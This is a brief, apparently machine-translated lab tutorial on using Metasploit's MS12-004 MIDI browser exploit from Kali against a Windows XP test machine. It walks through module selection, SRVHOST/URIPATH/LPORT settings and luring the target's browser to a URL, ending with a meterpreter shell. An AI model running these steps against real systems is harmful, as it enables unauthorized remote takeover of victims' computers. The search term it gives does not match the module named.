Metasploit MIDI file parsing remote code execution

1. Understanding Metasploit

Metasploit is an open source security vulnerability detection tool that helps security and IT Professionals Identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide true security risk intelligence. These features include smart development, password auditing,Web application scanning, and social engineering. Team work together in Metasploit and consolidated reports to present their findings.

2. Preparation

(1) Kali Linux

(2) Target drone Win XP SP3

3. Start

Start kali, use the command line, enter msfconsole, and enter the Metasploit Terminal Console interface.

Enter search 14-002

Use Exploit/windows/browser/ms12_004_midi(exploit this vulnerability)

Show options ( viewing option )

Set Srvhost 192.168.150.130 ( sets native IP)

Exploit ( generate address )

Set Uripath/( spoof URL) again exploit discover 4444 Port occupied at this time need to modify

Set Lport 1234

Again exploit in target drone to access the generated address with IE browser http://192.168.150.130:8080/

End of carriage return after monitoring session

Enter sessions (view session)

Sessions-i 1 (Connection session 1 is Id value) enter meterpreter after entering the shell

What to do after that you know ~ ~

Note: Multiple show options are available to view each step of the configuration correctly

You can enter msfconsole-h directly at the command line to see other uses

You can enter -help in the Metasploit Terminal console to view the commands available in Msfconsole

You can enter show targets to view the attack platform after exploiting the vulnerability

Metasploit MIDI file parsing remote code execution